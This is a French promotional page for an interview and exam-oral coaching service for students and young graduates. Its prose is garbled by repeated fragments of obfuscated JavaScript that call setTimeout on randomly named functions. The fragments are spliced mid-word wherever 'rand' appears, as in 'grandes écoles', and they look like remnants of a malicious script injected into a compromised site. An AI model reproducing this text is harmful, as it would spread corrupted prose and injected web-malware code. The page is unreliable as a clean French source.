Méthodologie VOUS

Notre mission : vous préparer à réussir vos entretiens

Depuis plus de 15 ans, nous avons fait passer des centaines d’entretiens de sélection et autant de jury d’examens de grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}es écoles, analysé des milliers de CV.

A travers notre longue expérience en entreprise et dans l’enseignement supérieur, nous connaissons parfaitement les attentes et les craintes des responsables pédagogiques, managers et responsables Ressources Humaines vis à vis des jeunes diplômés.

Sylvie Kaminka et Philippe Girard
Sylvie Kaminka et Philippe Girard

Vous préparer à un oral d’examen, à un jury de sélection de grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}e école ou franchir le pas vers le monde professionnel est notre domaine de prédilection !
Notre démarche vous éclairera sur les pièges récurrents qui vous attendent et les questions sensibles et personnelles qui pourront vous être posées. Ainsi vous serez prêts à y répondre sereinement en évitant tout risque d’être déstabilisés dans ce moment crucial …..

 

 

 

Nous vous aiderons à construire les arguments qui valorisent vos forces et votre personnalité.
Connaître et comprendre vos faiblesses pour savoir les justifier, analyser vos atouts et votre image pour augmenter la confiance en vous et être capable de donner le meilleur de vous même … tout en restant vous-même !

« Savoir comment mon attitude est perçue m’a aidé à prendre confiance en moi »  en recherche de stage de Mastère
« Savoir comment mon attitude est perçue m’a aidé à prendre confiance en moi » en recherche de stage de Mastère

Nous vous préparerons à renforcer votre confiance en vous.
C’est une des premières qualités reconnues du leadership. Et pourtant, dans un contexte anxiogène, la confiance, l’enthousiasme et l’aisance orale peuvent être totalement inhibés.
Le seul remède est la préparation pour donner le jour J le meilleur de vous même, et être capable d’exprimer votre spontanéité et votre esprit d’à-propos.

 

 

 

 

Nous vous conseillerons sur votre image qui doit devenir une force car c’est le premier message que vous envoyez sur vous même !

Ensemble nous décrypterons votre image tant sur le fond (votre discours, expression, argumentation,..) que sur la forme (style, posture, regards, ..).

« de l'importance du look »
« De l’importance du look »

Des recommandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ations et des exercices de simulation seront adaptés à votre propre personnalité et à votre propre projet, afin d’augmenter vos chances.

Une bonne préparation est totalement adaptée à la circonstance et à votre personnalité. Car chaque personne, chaque situation est différente même si certaines règles peuvent paraître simples comme être souriant et agréable ! Nous avons souvent lors de nos accompagnements une question aussi simple que « faut –il venir en costume cravate pour un stage en laboratoire de recherche en biologie ? dans une start up ou dans le digital ? » et « pour un rdv Ressources Humaines » ? Autant de micro questions auxquelles vous trouverez des réponses.

« C’est beaucoup mieux comme ça »
« C’est beaucoup mieux comme ça »

Notre coaching vous donnera le maximum de clés pour vous présenter plus serein et bien préparé à ces épreuves pour mieux convaincre.
Pour être le plus efficace possible, il vous faut anticiper votre préparation pour les dates fatidiques. De quelques semaines à quelques jours il n’est jamais trop tôt pour se préparer.